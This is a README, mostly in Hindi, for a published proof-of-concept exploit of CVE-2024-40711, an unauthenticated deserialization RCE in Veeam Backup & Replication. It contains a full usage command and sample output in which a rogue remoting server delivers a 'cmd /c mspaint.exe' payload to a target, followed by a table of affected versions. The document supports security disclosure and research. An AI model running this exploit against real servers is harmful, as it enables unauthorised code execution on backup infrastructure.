
CVE-2024-40711 के लिए पूर्व-प्रमाणीकरण एक्सप्लॉइट
Veeam बैकअप और रेप्लिकेशन के प्री-ऑथ डीसीरियलाइज़ेशन CVE-2024-40711 के लिए एक्सप्लॉइट
हमारा ब्लॉग पोस्ट तकनीकी विवरण के लिए देखें
https://github.com/user-attachments/assets/24e8122c-3e84-408b-87a9-684a9aabeb70
CVE-2024-40711.exe -f binaryformatter -g Veeam -c http://192.168.201.1:8000/trigger --targetveeam 192.168.201.158
__ .__ ___________
__ _ _______ _/ |_ ____ | |_\__ ___/_____ _ _________
\ \/ \/ /\__ \\ __\/ ___\| | \| | / _ \ \/ \/ /\_ __ \
\ / / __ \| | \ \___| Y \ |( <_> ) / | | \/
\/\_/ (____ /__| \___ >___| /____| \____/ \/\_/ |__|
\/ \/ \/
(*) Veeam Backup & Replication Unauthenticated Remote Code Execution Exploit (CVE-2024-40711)
- Vulnerability Discovered by Florian Hauser (@frycos) at CODE WHITE Gmbh (@codewhitesec)
- Exploit Written by Sina Kheirkhah (@SinSinology) at watchTowr
- Thank you to my dear friend Soroush Dalili (@irsdl) for his help
CVEs: [CVE-2024-40711]
(*) Creating payload for 'cmd /c mspaint.exe'
(*) Wrapping payload in the CDbCryptoKeyInfo custom gadget
(*) Sending Remoting Trigger
(*) Started Rogue Server
HttpServerChannel for 'trigger' created:
http://192.168.201.1:8000/trigger
Press any key to exit ...
[*] Processing message for '/trigger' from 192.168.201.158:50592 ... sending payload!
यह कमजोरी फ्लोरियन हाउज़र (@frycos) द्वारा CODE WHITE GmbH (@codewhitesec) में पाई गई थी। उनके उत्कृष्ट शोध का पालन करना सुनिश्चित करें, हमारी भूमिका केवल इस समस्या के लिए एक्सप्लॉइट का पुनर्निर्माण और विकास करना था।
| संस्करण | स्थिति |
|---|---|
| 12.2.0.334 | पूरी तरह से पैच किया गया। इस ब्लॉगपोस्ट में वर्णित कमजोरियों से प्रभावित नहीं। |
| 12.1.2.172 | प्रभावित, लेकिन शोषण के लिए प्रमाणीकरण आवश्यक है। निम्न विशेषाधिकार वाले उपयोगकर्ता मनमाना कोड निष्पादित कर सकते हैं। |
| 12.1.1.56 और पहले | अप्रमाणित RCE के लिए संवेदनशील। |
यह एक्सप्लॉइट Sina Kheirkhah (@SinSinology) द्वारा watchTowr (@watchtowrcyber) में लिखा गया था।
हम इस एक्सप्लॉइट में उनकी मदद के लिए Soroush Dalili को धन्यवाद देना भी चाहेंगे।
नवीनतम सुरक्षा अनुसंधान के लिए watchTowr लैब्स टीम को फॉलो करें